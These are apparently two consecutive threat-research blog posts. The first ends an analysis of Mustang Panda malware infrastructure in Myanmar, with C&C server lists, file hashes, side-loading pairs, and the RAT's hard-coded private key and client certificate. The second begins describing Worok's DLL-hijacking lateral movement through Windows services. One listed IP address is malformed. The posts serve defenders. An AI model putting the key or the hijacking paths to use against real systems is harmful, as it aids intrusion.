The fact that the affected client is from Myanmar, and the fact that the server contains some parts of the described toolset strongly indicates that it is part of the same campaign. Nevertheless, since at least one archive was renamed, we were unable to fully enumerate its contents. Similarly, we were not able to verify whether the server contains exfiltrated data.

C&C infrastructure

JSX RAT

The JSX RAT attempts to communicate with 103.169.90[.]132 using TLS client authentication. The certificate (see Appendix A.2) is hard-coded and we can try to use it to confirm related infrastructure. Looking at the server certificate data, we see that it imitates a real hosting company.

Common name:        blue.net
City, country:      San Francisco, CA, US
Fingerprint (sha1): e0adf667e287b0051988dda2b85e7541d7532703
Self-signed

Interestingly, the C&C’s certificate had the exact same subject as the client certificate. Searching for other servers that use the same certificate yielded a couple more servers. Furthermore, we were able to confirm that the majority of these servers are running the same C&C software because they accept the RAT’s hard-coded client certificate.

A server at 118.31.166[.]5 seems to be an outlier among these servers with port 4433 being exposed. Since it is the oldest one using the same certificate and the server exhibits the same communication traits on that port, we suspect that it might be a development server.

Two of these servers were open to RDP connections with a certificate that had o9c[.]pg as its CN (Common name). We tried to go further using these certificates to uncover further candidates for C&Cs. The timeline of uncovered servers is below:

Timeline of servers using the discovered certificates. Blue ones use a certificate with blue[.]net CN, red ones use o9c[.]pg as CN, purple ones have both. The highlighted line corresponds to JSX RAT C&C.

These are servers using the same certificate:

IPGeoNotes
103.169.90[.]132MYOriginal C&C Ports: 443, 22, 53, 3389
45.79.409[.]10USSuspected RAT C&C on port 443
118.31.166[.]5CNSuspected RAT C&C on port 443, different response codes
181.215.246[.]173MY
39.104.52[.]188CNSuspected RAT C&C on port 443
45.56.90[.]127USSuspected RAT C&C on port 443
154.204.176[.]249HK
47.244.2[.]17HKSuspected RAT C&C on port 443, RDP
47.96.236[.]105CN
134.122.129[.]170HKSuspected RAT C&C on port 443
172.105.158[.]102USSuspected RAT C&C on port 443, RDP
192.46.213[.]63INSuspected RAT C&C on port 443
Overview on the servers with ties to JSX RAT C&C.

These are RDP servers sharing the same certificate as the two C&Cs with open RDP port:

IPGeoNotes
47.75.123[.]100HK
47.242.171[.]26HK
47.57.87[.]221HK
172.105.118[.]92SG
172.105.159[.]130US
47.244.2[.]17HKIs also on the previous list.
47.242.95[.]126HK
8.210.16[.]197HK
172.104.92[.]7JP
45.33.34[.]11US
45.79.102[.]41US
47.57.108[.]231HK
194.195.240[.]87DE
47.56.65[.]198HK
8.210.128[.]37HK
172.105.158[.]102USIs also on the previous list.
47.57.110[.]128HK
47.242.6[.]26HK
23.92.26[.]127US
47.75.183[.]119HK

Other C&C servers:

FolderGeoC&CNotes
DISK2/DISKM/MF20211228RU188.127.249[.]169Stealer
HT3MY45.121.147[.]172Korplug
JSXMY103.169.90[.]132RAT
MG/MG44SG23.106.122[.]81Remote shell
SE4/SE5/SE6/SE7SG91.245.253[.]72Backdoor (ZIPDLL.dll)
SEEMY103.91.66[.]116Backdoor (ZIPDLL.dll)
T3YKMY111.90.148[.]95Remote shell
U5_2MY103.117.141[.]202RAT
YK51LOWMY
N/A
mod.mmgpms[.]com
txt.mm-film[.]com
Backdoor
1260MUS45.134.83[.]4Korplug
GDU1_NEW/GDU3https://github.com/YanNaingOo0072022/View2015Encrypted Google Drive token

Conclusion

It is not very often we stumble upon such a stash of samples that is used to distribute malware to infected devices; especially when we are talking about tools that are strongly correlated with a notorious APT group. We have shown links to multiple previously published research around campaigns both using tools and TTPs, providing us with high confidence that the threat actor in question is Mustang Panda.

The exfiltrated data indicates that the toolsets that we have found were actively used around Myanmar. For instance, we have found audio recordings that corresponded to the audio recording tools we have identified in the archive named AUD. Although many tools were simplistic in their nature and sometimes also in chosen obfuscation methods, some archives contained tools which seem to deserve further analysis; be it due to their complexity or technical implementation.

What was really surprising was the sheer scale of the compromitation. We have identified many high-profile government targets, some opposition entities along with a few NGOs. It is worth noting that given the sheer volume of data and the language barrier, we have only been able to associate some of the victims with a specific organization. This means that the list of targets is likely incomplete and should be considered as approximate. Nevertheless, the daily rate of gigabytes of exfiltrated data should be enough to give a strong hint on the scale of the operation.

Appendix

C&Cs

FolderC&CNotes
DISK2188.127.249[.]169Stealer
HT345.121.147[.]172Korplug
JSX103.169.90[.]132RAT
MG/MG4423.106.122[.]81Remote shell
SE4/SE5/SE6/SE791.245.253[.]72
193.42.36[.]214
Backdoor (ZIPDLL.dll)
SEE103.91.66[.]116Backdoor (ZIPDLL.dll)
T3YK111.90.148[.]95Remote shell
U5_2103.117.141[.]202RAT
YK51LOWmod.mmgpms[.]com
txt.mm-film[.]com
Backdoor
1260M45.134.83[.]4Korplug
GDU1_NEW/GDU3https://github.com/YanNaingOo0072022/View2015Encrypted Google Drive token

Certificates and keys

A.1 JSX private key

-----BEGIN EC PRIVATE KEY-----
MHcCAQEEIPq1gFM9BHY6lKw+F09iQ4rY5ZDpZhpVuLbLEgKpN1EFoAoGCCqGSM49
AwEHoUQDQgAE8ReYJNz1RlchdTIxo0/4GqPVsJ2m6QFMW0vVMLKYWeINX4Ih9vPV
OgzHq6+qeNxzvAbS4D9jTETTMKssSssr0Q==
-----END EC PRIVATE KEY-----

A.1 JSX certificate

-----BEGIN CERTIFICATE-----
MIICBDCCAamgAwIBAgIUPAoKZshUkyHcTvej+gio/kTTd/AwCgYIKoZIzj0EAwIw
RTELMAkGA1UEBhMCVVMxCzAJBgNVBAgTAkNBMRYwFAYDVQQHEw1TYW4gRnJhbmNp
c2NvMREwDwYDVQQDEwhibHVlLm5ldDAeFw0yMTEwMTIwMzQ0MDBaFw0zMTEwMTAw
MzQ0MDBaMEUxCzAJBgNVBAYTAlVTMQswCQYDVQQIEwJDQTEWMBQGA1UEBxMNU2Fu
IEZyYW5jaXNjbzERMA8GA1UEAxMIYmx1ZS5uZXQwWTATBgcqhkjOPQIBBggqhkjO
PQMBBwNCAATxF5gk3PVGVyF1MjGjT/gao9WwnabpAUxbS9UwsphZ4g1fgiH289U6
DMerr6p43HO8BtLgP2NMRNMwqyxKyyvRo3cwdTAOBgNVHQ8BAf8EBAMCBaAwEwYD
VR0lBAwwCgYIKwYBBQUHAwIwDAYDVR0TAQH/BAIwADAdBgNVHQ4EFgQULCt+JQ1h
n+CNR27Lm0giuJbAHGAwIQYDVR0RBBowGIIIYmx1ZS5uZXSCDHd3dy5ibHVlLm5l
dDAKBggqhkjOPQQDAgNJADBGAiEA9c8UxcF/xYGVThbl3vfKpmJQKQLi8LP+2cui
o9Z3iZICIQCxJOXs+4ScVpyIkw8HYCCv3x0CDVv4xfiGHEEW+ZLZYA==
-----END CERTIFICATE-----

Side-loads

ArchiveBinaryDLL
BMD,YK41Symantec.exeSHELLSEL.ocx
YK41LOWGoogleUpdate.exeSbieDll.dll
YK41LOWatkexComSvcRes.exeCefBrowser.dll
HT3x.exeVender.dll
GDUSamvd.exeSmadHook32.dll
GDUPIZvsgraphics.exevsgResources.dll
GDU1/GDU2CefSub.exeCefBrowser.dll
GDU2/GDUPIZ/GDU1_NEW/GDU3piz.exevntfxf32.dll
GDU_OLDAltTraceTool.exeatltracetoolui.dll
GDU1_NEW/GDU3NitroPro.exeCefBrowser.dll
GDU3piz.exeFwcWsp.dll
WD HP.exeHPD.dll
DISK2/DISKM/MF2021188HPCustPartUI.exeHPCustPartUI.dll
127COleView.exeACLUI.dll
KKL/KKL1mscorsvw.exemscorsvc.dll
MG/MG44dabs.ex/44.exSensorAware.dll
AUDmsync.exmcaltib.dll
CHRbrowser.exbrowser_elf.dll
T3YKygfdt.execorecrl.dll
UCmelt_64.exelibmlt-6.dll
1260Mupservice.exebreakpad.dll
U5_2HPCustPartUI.exeHPCustPartUI.dll
U5_2PlugInInstallerUtility2.exePlugInInstallLib.exe
SE1FacialFeatureDemo.exefacesdk.dll
SE1/SE3/SE4/SE5/SE6/SE7/SEECUZ.exeZIPDLL.dll
SE1%volume_drive%.exeMSFTEDIT.dll
SE1/SE7GUP.exelibcurl.dll
SE1spoololk.exeWNTFXF32.dll
SE3/SE4/SE5/SE6/SEEvivaldi.exevivaldi_elf.dll
SE6/SE7wsc_proxy.exewsc.dll

File hashes

\1260M

1ded7b4cab302bc7229c92723056d07d5bd9563e88fe082da0a396942fba5958 breaklog.dat (Korplug)
2895fdac192a4b0ffd70b6b207d49cd7c8f68945eb5c09e3d51e2fded6c6c32f breakpad.dll (Loader)
ce13248fa2da5b27773f855c2dd0c6ce276b4a10b020e4da57bc47ab0fe07eae upservice.exe

\127C

1769c7778cbcd937ae317f4982f404b0d7ae7ee5e2b2af4efb160c5233a8f476 ACLUI.dll (Korplug)
8ff84f79455b84bd73e7c0641532a60e8132599c29d3f85fb54f3d7da53e1817 ACLUI.DLL.UI (Loader)
91f6547bceddfb2f241570ac82c00de700e311e4a38dea60d8619638f1ed3520 OleView.Exe

\AUD

cd6bcf240de87fe3f1b5a6a24db1b2728acad5f7bcfe124e5bc2d7bdac2f64a9 mcaltlib.dll (Audio recording)
075f9dfb6ab3379f69165c03991abf1a969ca0c21e04564543564dc536ea95dd mcsync.ex

\BMD

55eacabb7c054355d2e8c3a82c075338c9ac642d86ee5d3fa1fca3f621e43cb2 SHELLSEL.ocx (Loader)
d139940023fa2c602e2a31faa807b9df074f34747511bd61db961d20155b8c84 ShellselDb.dat (Korplug)
61d1943f0b702f4c16bb37228ade1d8f0ef4675b480921950d026c82e4a65fde Symantec.exe
491d9f6f4e754a430a29ac6842ee12c43615e33b0e720c61e3f06636559813f7 SymantecHp.exe (Launcher)

\CHR

e3e2164c54a5c8ab063695bc41b6c0c0ddc390c790de8ad24d6169dba46f7734 22.1.1.1543.manifest
4063cf4ba2d4e12c277479399d4489e45a48b1013d8d54b5a589784fe7158978 browser_elf.dll (cookie dumping)
12b15f31f295416417f1e028904a4e10a0c8ec39dd00bac7df4887c194f2865b browser.ex

\DISK2

8857232077b4b0f0e4a2c3bb5717fd65079209784f41694f8e1b469e34754cf6 HPCustParticUI.exe (Sideload)
7ea21215968c43f9fe28f94926e3547f2f7a0e35cdf40392b0b6aea80fe11314 HPCustPartUI.dll (Stealer)
c9121c7874d2fd88ff7af35eb3f3cd18ab7162390db008043037383cdad6ff56 HPCustPartUI.log (Ecnrypted stealer config)
86e39b5995af0e042fcdaa85fe2aefd7c9ddc7ad65e6327bd5e7058bc3ab615f MSVCR120.dll

\DISKM

8857232077b4b0f0e4a2c3bb5717fd65079209784f41694f8e1b469e34754cf6 HPCustParticUI.exe (Sideload)
788fe764f6f5e0fff31b06fd8b94ee0cf51a3082c1321d8db96708c2a6abc3ee HPCustPartUI.dll (Stealer)
62d770f240cecebd6cf725df05ab1e863d83895abc9396664a6090dbcc983d6f HPCustPartUI.log (Ecnrypted stealer config)
86e39b5995af0e042fcdaa85fe2aefd7c9ddc7ad65e6327bd5e7058bc3ab615f MSVCR120.dll

\GDU

d12a1750980ef3943c6d7e152948059261944b8afe06b8a280b7fbe61aba3c9b rar.dat (Config)
e64b533d60a21ca8ddbfcf8a1b154ed351383b0196d534bf229101a6cc4d1931 rar330.exe (RAR)
def8fdb95bb53514698b9df1c64e329adfca59adf2e898c3daab16f1e4760bc6 RarCon.SFX (Exfiltrator)
4f54a6555a7a3bec84e8193d2ff9ae75eb7f06110505e78337fa2f515790a562 Samvd.exe
375e88d1f38604c901f2b9fd5b9ada4c44c1f4c172f7cd58cd67e9248ff966ab SmadHook32c.dll (Loader)

\GDU-OLD

197d0ad8e3f6591e4493daaee9e52e53ecf192e32f9d167c67f2ffb408c76f2c AtlTraceTool8.exe
33f631c0b561199b5feb9020faa99e50efa9f421d7484ffa640c5561494726da mfc110u.dll
45a61f4b7e5798f1389a7d6abc8a924c37db6f51552b4cafc901e7e4a50dabc6 msvcr110.dll
db75b25b69b7b6f3206226461d8bde7c05049922dc463e8932d11710fad74833 piz.exe (Collector)
46811fc41623677637aaadcfbe89811d187b390bfd7e4f3e8efd2dd1d078a631 rar.dat (config)
0dcaf08b7b1f8de3999af567144b13f36bea3a68f46f81f8443a81a50a86a09c atltracetoolui.dll (Loader)

\GDU1

2c17b68040dda192939e4b7f65b2935cb6c467b8a4b2c3d512bde6cc5a60adaf cache (Exfiltrator)
e412569c23722c469ee533efb62bbded53d1909b58c8cf7bff9897c466c9df9a CefBrowser.dll (Loader)
cb8a83b590893daa9b02b8e1a1c9afb68d6f2a82c9e0d2d2c63a36a510f6fda3 CefSub.exe
beb44eadd141b7ae46e40e1bf888c302cb7096826e772f0b20ce6f213c69058d piz.exe (Collector)
46811fc41623677637aaadcfbe89811d187b390bfd7e4f3e8efd2dd1d078a631 rar.dat (config)

\GDU2

2c17b68040dda192939e4b7f65b2935cb6c467b8a4b2c3d512bde6cc5a60adaf cache (Exfiltrator)
e412569c23722c469ee533efb62bbded53d1909b58c8cf7bff9897c466c9df9a CefBrowser.dll (Loader)
cb8a83b590893daa9b02b8e1a1c9afb68d6f2a82c9e0d2d2c63a36a510f6fda3 CefSub.exe
390d75e6c7fc1cf258145dc712c1fac1eb183efccee1b03c058cec1d790e46b1 piz.exe (Collector)
46811fc41623677637aaadcfbe89811d187b390bfd7e4f3e8efd2dd1d078a631 rar.dat (config)
869b8dd87e402049eae435de3de1e15a021d9fcbf79a20be3b030d3782599903 vntfxf32.dll

\HT3

59cf961f7316656e73b269a86b04836a7a7254f021a8a3132a927b02373225d6 AUG.json (Encrypted and compressed data)
091408cdd56267bc4fb4cb54f2d91701aa8cdcede334a648566eea89f1682925 Vender.dll (Loader)
00bfbbe6e9d0c54312de906be79cc1e9f18b2957856a1215eaff1ac7bb20e66f x.exe

\JSX64

c617016fb8809655f9189648b9b41a727c0b49cdb79a28f13f710d23f3527a64 install.js (Executer)
21bf4631775b6c17f9e94c0901ffbb7718a0e6094582bcb1683b934aca24e18f mozload.dll (RAT)
f4a31d15cd5aa3441e5e31c1add6e0c3551a1aad5abb75f0abd76990f2824acc scx.exe (Installer)
645ee3601aea4c1af8b938f64698bf6c5978b1151aef53e183bb768791c927e2 svchost.dll

\JSX641

73903c2c46b5055380fc2a238c96f7f2ca2a5acf1cd1e568b2d2be0638c68fd1 install.js (Executer)
50bee35c965a99b3f8f722296e4ed6474ca62d96ea5fc4897e7d1563ed173d5e mozload.dll (RAT)
e27bfbe87c78945b1d79fc027c3f0a27a07d0dddc742783bf686c1a8133a2f48 scx.exe (Installer)
8cebfe33cd69747cc1333fe598d9b0331103e0869d6f1b1f75e28b3b8f11243d svchost.dll

\JSX86

c617016fb8809655f9189648b9b41a727c0b49cdb79a28f13f710d23f3527a64 install.js (Executer)
fd1ec183124d2d82dae1dd228de88440bc142cf6430c9c93518e25f1dde052fd mozload.dll (RAT)
9e3788cacb3d38e4e15da7e4887650efa6a3b17a65a314fcb4e059d9f88481a8 scx.exe (Installer)
5e8311c26091839a292e2d12f88378f8093fc739ced86aa1e9ba1b707ad516d8 svchost.dll

\JSX861

73903c2c46b5055380fc2a238c96f7f2ca2a5acf1cd1e568b2d2be0638c68fd1 install.js (Executer)
f9d94c1dcdbcefddb4f1d47291422c6198fd11052aea761acf8b5755802ca922 mozload.dll (RAT)
49a81878ec282c3c9d4dd72920d9283e2c86d0bb96b468e010901b3f4f9c75ed scx.exe (Installer)
79440abf29d1b56cb1c95a12f554fe052e21a865fea56a025e216f342ffbccbd svchost.dll

\KKL

fae5b61723106d44de46b3ec49e80067f63f82f09501142186984a658bc99c38 KBE.dll (Clipboard stealer, keylogger)
ed6b3af0edcd3b57c0616e1b7819b5e1c1e72327300172ff2664b158f65861b2 mscorsvc.dll (Loader)
0809e3b71709f1343086eeb6c820543c1a7119e74eef8ac1aee1f81093abec66 mscorsvw.exe

\KKL1

4afa4582975d31144b3af692f123f87b6400a45475e41fa1822c7acdb17590f0 KBE.dll (Clipboard stealer, keylogger)
9af8336050c40105864bf9314355471494dc631fd88a0b444291b63b941b7822 mscorsvc.dll (Loader)
0809e3b71709f1343086eeb6c820543c1a7119e74eef8ac1aee1f81093abec66 mscorsvw.ex

\MF20211228

8857232077b4b0f0e4a2c3bb5717fd65079209784f41694f8e1b469e34754cf6 HPCustParticUI.exe
9f1d1a94026c54396a4c0b6327d317836dc9dc67178810428302efcbf5225a42 HPCustPartUI.dll (Stealer)
86e39b5995af0e042fcdaa85fe2aefd7c9ddc7ad65e6327bd5e7058bc3ab615f MSVCR120.dll

\MG

473b4f8b8640a68d1092f6b54b521c6b0ccb1c567eca4a18a2c2da3481bc027a dabs.ex
cfe1447e7515ad831fcfedb9a5c1a721885b0542b775e4028a277a27e724ec73 SensorAware.dll (Figerpring, remote-shell)

\MG44

473b4f8b8640a68d1092f6b54b521c6b0ccb1c567eca4a18a2c2da3481bc027a 44.ex
cfe1447e7515ad831fcfedb9a5c1a721885b0542b775e4028a277a27e724ec73 SensorAware.dll (Figerpring, remote-shell)

\NB

c9d5dc956841e000bfd8762e2f0b48b66c79b79500e894b4efa7fb9ba17e4e9e nb.dat (Nbtscan)

\SE1\Bin

8364bae4e2951957403cbe3a78362edb7d41c34f49c81f0336fcb28d1510d5e1 facesdk.dll (Dispatcher)
0d243cbcd1c3654ca318d2d6d08f4e9d293fc85a68d751a52c23b04314c67b99 FacialFeatureDemo.exe
e5bbbf34414426f63e6cd1354c306405e54bf31279829c7542dccfb7d85af0ec GUP.exe
92717951aae89e960b142cef3d273f104051896a3d527a78ca4a88c22b5216a5 gup.xml
7e1c49d45935fb5d20add5baf60400fb64fbf0299a3af3b0be764b2d265e368a libcurl.dll (hides malware files)
390d75e6c7fc1cf258145dc712c1fac1eb183efccee1b03c058cec1d790e46b1 spoololk.exe
abf7bb6eb92f2f358e8e57c1be03efe5a7f81e3d3eb4134257c3483e9e7782c0 VNTFXF32.dll (persistence)

\SE1\Data

1a4e92e09957578cc8d8c1fbdaba55e306e7bcbc6208ee00e33bb37e849156f9 aweu23jj46jm7dc
13cf1c57f1c143c592173b1e91ddb652d5dd1c2015289ac890a37253058b54be bjca3a0e2sfbs
12acd296a009d9e8fbd9511d3c0586f331d450b9c12f651e0554764e50cfb7e7 sf24acvywsake
4a6ed717a2d7f0953e4b25c2652c9a231146f60b35d9a5e3cf782c772727b1bc sf33kasliaeae

\SE3\Bin

61d1943f0b702f4c16bb37228ade1d8f0ef4675b480921950d026c82e4a65fde Symantecs.exe
a8f3bc45ac0dcf351c028ecabfd68e8e551cd97f8dc0fc6e62e135668cde9277 LDVPOCX.OCX (Dispatcher)
bb6cf240bdabeea90321cab7d48e268df2b5240d84aab0d5ae5ffe415a6943e4 vivaldi_elf.dll (hides malware files)
58e7af5eb1acb5c9bee821d59054c69263aed3dce1b95616255dea7114ad8494 vivaldi.exe

\SE3\Data

51c3d115e0173e3ba6eeaea3d53b86bce45367e50feed82d8efed2065d845d28 3.8.2259.42.manifest
6ded96d7609cc085db57764c40a38379cba50b965f959650ca8d1605ae0411e8 csdkset.dat
a8f0dff3c57621282a1262ddaa559f055f2f2cc717a7695d8bfbf7a6898b843c EdrEpmpCStorages.dat
7659be61fc1e16c4721b451225ec7c8f932e9e7357894ddea3a4ada9583996b5 PchEpmpCStorages.dat
9015378ed6d7537f07e61c78b3c35766d63465970b63d13c9b447dc8bb90e2d7 prodcltdef.dat

\SE4\Bin

61d1943f0b702f4c16bb37228ade1d8f0ef4675b480921950d026c82e4a65fde Symantecs.exe
01cd1530b0db54c834ef275e0cc617645a23e1f250bc35c248d546c28da220fb vivaldi_elf.dll (hides malware files)
9fb4c9f1995b02ece99b62a4efc0df5c916a1858f57730225f3c419fce0de24c LDVPOCX.OCX (Dispatcher)
58e7af5eb1acb5c9bee821d59054c69263aed3dce1b95616255dea7114ad8494 vivaldi.exe

\SE4\Data

51c3d115e0173e3ba6eeaea3d53b86bce45367e50feed82d8efed2065d845d28 3.8.2259.42.manifest
01cd1530b0db54c834ef275e0cc617645a23e1f250bc35c248d546c28da220fb csdkset.dat
baaaffe80060fb89b06ff19dfb6c76835fc6639d81513e2d9e49716f1816ccc4 EdrEpmpCStorages.dat
9fb4c9f1995b02ece99b62a4efc0df5c916a1858f57730225f3c419fce0de24c LDVPOCX.OCX
f488e4e838fa447c9b08fc74d4180faeb465f9070c443625b7515aed7c282fa6 PchEpmpCStorages.dat
ab89d614923b92ce2eb7ed48357b2d1755b8a8f572ead3b32bb63a79e259186d prodcltdef.dat

\SE5\Bin

5828fd07716140e5fefec1b07751378d9b76952e66b2c0fb0a860313d4030b4d LDVPOCX.OCX (Dispatcher)
61d1943f0b702f4c16bb37228ade1d8f0ef4675b480921950d026c82e4a65fde Symantecsy.exe
bb6cf240bdabeea90321cab7d48e268df2b5240d84aab0d5ae5ffe415a6943e4 vivaldi_elf.dll (hides malware files)
58e7af5eb1acb5c9bee821d59054c69263aed3dce1b95616255dea7114ad8494 vivaldi.exe

\SE5\Data

e6fdd0d22abe3484d57715bd83143e5810b74f3f9dc8780344c66af2c0894d76 aweu23jj46jm7dc
50814a35a9d157405252c8ba52c12d1cf5adf137598173c6522cbe058e14b7ff bjca3a0e2sfbs
1d68f4afd0fd908d35db6d9710ab2fc92fb5ca739d6351e1bf513e068fbd00a0 sf24acvywsake
5427cd51f0120a27ed75d3ac27d6f8eac6f27c54d8658236a52a281d6433496b sf33kasliaeae

\SE6\Bin

a67094334ae2135e50bf2074f08d3a99075a53a174da6bdf22eca54293bb8e9b vivaldi_elf.dll (hides malware files)
58e7af5eb1acb5c9bee821d59054c69263aed3dce1b95616255dea7114ad8494 vivaldi.exe
bd4635d582413f84ac83adbb4b449b18bac4fc87ca000d0c7be84ad0f9caf68e wsc_proxy.exe
e0c240f5776d158da7529d8c0e3d5be4d6f007e51e4be570e05b744d0452011d wsc.dll (Dispatcher)

\SE6\Data

51c3d115e0173e3ba6eeaea3d53b86bce45367e50feed82d8efed2065d845d28 3.8.2259.42.manifest
7620acb11f0471515079a69ee2cec0cd74485fb13c779d41c2b43b87718c63ff aweu23jj46jm7dc
3fc3fb81a43b9ac155e42367769eb5c0d6dd08c06a025ba93697c6b2667bf1e7 bjca3a0e2sfbs
f2c5004450a749bef14ee779e1c8e4c08702f089248d0a282e6a679d29b0996d sf24acvywsake
10d58013b8a34e10e8548b016154963097dcff15e5673bf24e8ed18513ad4a64 sf33kasliaeae

\SE7\Bin

e5bbbf34414426f63e6cd1354c306405e54bf31279829c7542dccfb7d85af0ec GUP.exe
92717951aae89e960b142cef3d273f104051896a3d527a78ca4a88c22b5216a5 gup.xml
7e1c49d45935fb5d20add5baf60400fb64fbf0299a3af3b0be764b2d265e368a libcurl.dll (hides malware files)
bd4635d582413f84ac83adbb4b449b18bac4fc87ca000d0c7be84ad0f9caf68e wsc_proxy.exe
e4ddf5af63fdfe85c5a4573d4768699ebdaa5b5b67b7cb6834840c696808a8e5 wsc.dll (Dispatcher)

\SE7\Data

b7a38292131c131d75413133f101114a1b72bd02e27cc6aea7a836ff964f961f sf24acvywsake
28aadf5b14ba0cb38a33ab53796dba12e7d59479744f0cca225b10be44730b9c sf33kasliaeae
ec56a6fa6804e47f331daee1460c3d07e01fe45edac5d6b1feb01fbbd8396f91 aweu23jj46jm7dc
e32447bd309a6941a1fff4fa559376d9c723afd1b9ce2a1c2dced4b9db6a6f6a bjca3a0e2sfbs

\SSE

51c3d115e0173e3ba6eeaea3d53b86bce45367e50feed82d8efed2065d845d28 3.8.2259.42.manifest
5dafacfa147f087dd0a706cf274e20cbb58f634ba14424d3433efc2e829aa7cd csdkset.dat
b9924c66506ccad566d6c26b8db499e498a9dc840acacb2d8d3bf9d73818814a EdrEpmpCStorages.dat
180a2f3eb004f93590e4fb18cdc3dd6e18815587637ac354ca99f7513aa63633 LDVPOCX.OCX (Dispatcher)
9add5663bc846b4b7cdefcd0e09b882e2f16f755e2e6540efc6ea2072c93f3f2 PchEpmpCStorages.dat
756d1cb0e74b309d53d4f16b043514da128c8b3b89c7d5e46897b61f74bad2d7 prodcltdef.dat
61d1943f0b702f4c16bb37228ade1d8f0ef4675b480921950d026c82e4a65fde Symantec.exe
bb6cf240bdabeea90321cab7d48e268df2b5240d84aab0d5ae5ffe415a6943e4 vivaldi_elf.dll (hides malware files)
58e7af5eb1acb5c9bee821d59054c69263aed3dce1b95616255dea7114ad8494 vivaldi.exe

\T3YK

3c0d3783a5ccdecf3786db0053b1352d6fb5a37d9081cc32ec6d5bb611064ce3 coreclr.dll (remote shell)
f11009988b813821857c8d2db0f88e1d45b20762f62a3cf432339f352b12cefe ygfdt.exe

\U5_2

2a971ba79f9f7378e11a47dcafa78e9fe4b1f0c659f7f310209d3e6671d5dc31 Ativir.csc (bundled payloads)
9cd8c5d34fd460dd0e240f5e54ade689d808469d6da5e0bd087cc71e6f851c6a core.exe (executes path from config)
caeb48fd04a5fe8b0b4bd32b538ed5f1f303b0487037cf37864f0b5665ff093a install_.exe
2f2a5e5cdb262cd62b43b88bf1e9cfb40a26eac5897616b9eacec4e25d95cbb9 PlugInInstallerUtility2.exe
a90e048c74697775bba2e4c4bfa45d369e44e9a020a83956aa44a50ab8a9a249 PlugInInstallLib.dll

\UC

f349183462f1aeac8d3afb43c723af0252c157d376637f30fb7c87fdf80ee965 libmlt-6.dll (UAC bypass)
a23dbce5bcde8ce541b8f326a951d29f6241280d944a1e921ca8658d3d4b65ac melt_64.exe

\WD

8857232077b4b0f0e4a2c3bb5717fd65079209784f41694f8e1b469e34754cf6 HP
97efd0abf726acfc1a5b4a0b460a727724f43ef9f1e788bada4942d715d4ab87 HPD (Loader)
86e39b5995af0e042fcdaa85fe2aefd7c9ddc7ad65e6327bd5e7058bc3ab615f MSVCR1
5f31d558417528b4c635afd6c17347dc393c7dfcecfb79040fe97d9f1abf3776 S (korplug)

\X

28bed0d5bcfb2d5597af881a2be3098327f2d83f14948c6a46cde3cd0776eb1c x.ex (status checker)

\YK41

edab53d39734965a7cadc2a21662d6a16c9b04b2961dfe9eb76aeda040786e25 hp_ui.xslbcdsj (encrypted Korplug)
071558464f6d067f3044b7ee3819fcb3a049b8be3535043db41123c2fde5d451 SHELLSEL.ocx (Loader)
61d1943f0b702f4c16bb37228ade1d8f0ef4675b480921950d026c82e4a65fde Symantec.exe

\YK51LOW

cb8a83b590893daa9b02b8e1a1c9afb68d6f2a82c9e0d2d2c63a36a510f6fda3 atkexComSvcRes.exe
9bdccd5e4617dfbcaf85228c60703369a8848ad8bb86e00e75e504a26fbe932a CefBrowser.dll
b29b38217921a6b36113049bd9cb4fb2ec52816bff7cd731621ff2fa3dbc7b01 DP45126C.lfl (Decryptor)
90a29c688ce683fb2201145faac00cb44c3d5566697279b68960c6bc3208ae84 GoogleUpdate.exe
fa56ba25861f1b5040afd04bfbfd36353004cd6b2c457971fb01db26ff002f35 GoogleUpdateOnDemand.exe
c9ed69e7bf233ba1edd18a1f91671faee9b7756aa77fe517319098706e78cde5 SbieDll.dll (Loader)

The post Hitching a ride with Mustang Panda appeared first on Avast Threat Labs.

PNG Steganography Hides Backdoor

10 November 2022 at 12:15

Our fellow researchers from ESET published an article about previously undocumented tools infiltrating high-profile companies and local governments in Asia. The tools, active since at least 2020 are designed to steal data. ESET dubbed them Worok. ESET monitored a significant break in activity from May 5, 2021 to the beginning of 2022. Nevertheless, when Worok became active again, new targeted victims – including energy companies in Central Asia and public sector entities in Southeast Asia – were infected to steal data based on the types of the attacked companies.

The researchers from ESET described two execution chains and how victims’ computers are compromised. The initial compromise is unknown, but the next stages are described in detail, including describing how the final payload is loaded and extracted via steganography from PNG files. However, the final payload has not been recovered yet. Detailed information about Worok, chains, and backdoor commands can be found in the ESET’s article Worok: The big picture.

Our analysis aims to extend the current knowledge of ESET research. We have captured additional artifacts related to Worok at the end of the execution chain. The PNG files captured by our telemetry confirm that the purpose of the final payload embedded in these is data stealing. What is noteworthy is data collection from victims’ machines using DropBox repository, as well as attackers using DropBox API for communication with the final stage.

Compromise Chain

We intend to remain consistent with the terminology set by ESET’s research. Our research also has not discovered the whole initial compromise of the malware. However, we have a few new observations that can be part of an infiltrating process.

Figure 1 illustrates the original compromise chain described by ESET. In some cases, the malware is supposedly deployed by attackers via ProxyShell vulnerabilities. In some corner cases, exploits against the ProxyShell vulnerabilities were used for persistence in the victim’s network. The attackers then used publicly available exploit tools to deploy their custom malicious kits. So, the final compromise chain is straightforward: the first stage is CLRLoader which implements a simple code that loads the next stage (PNGLoader), as reported by ESET.

Figure 1. Worok compromise chain
Initial Compromise

The specific initial attack vector is still unknown, but we found four DLLs in compromised machines containing the code of CLRLoader. Our detections captured a process tree illustrated in Figure 2.

Figure 2. Process tree running CLRLoader

This process tree was observed for WLBSCTRL.DLL, TSMSISrv.DLL, and TSVIPSrv.DLL. The mutual process that executes the DLLs is svchost -k netsvcs. Therefore, the initial process is SvcHost introducing a Windows service. The DLL files help us to identify two Windows services, namely IKE and AuthIP IPsec Keying Modules (IKEEXT) and Remote Desktop Configuration (SessionEnv). Both services are known for their DLL hijacking of DLL files missing in the System32 folder by default, SCM and DLL Hijacking Primer.

Lateral movement

The DLL hijacking in the System32 folder is not a vulnerability by itself because the attackers need administrator privileges to write into it. However, we assume the existence of an implemented reverse shell with administrator privileges as a consequence of the initial compromise. In that case, the attacker can efficiently perform the lateral movement via Service Control Manager (SVCCTL).

In short, the attackers place the hijacked DLL files into %SYSTEMROOT%\System32 and then start an appropriate service remotely. 

List of abused Windows services and their DLL files:

  • IKE and AuthIP IPsec Keying Modules
    • C:\Windows\System32\WLBSCTRL.dll
  • Remote Desktop Configuration
    • C:\Windows\System32\TSMSISrv.dll
    • C:\Windows\System32\TSVIPSrv.dll

The second observed DLL hijacked is related to VMware machines. The attackers can misuse the hijacking of vmGuestLib.dll, which is used by the WMI Performance Adapter (WmiApSrv) service to provide performance information.

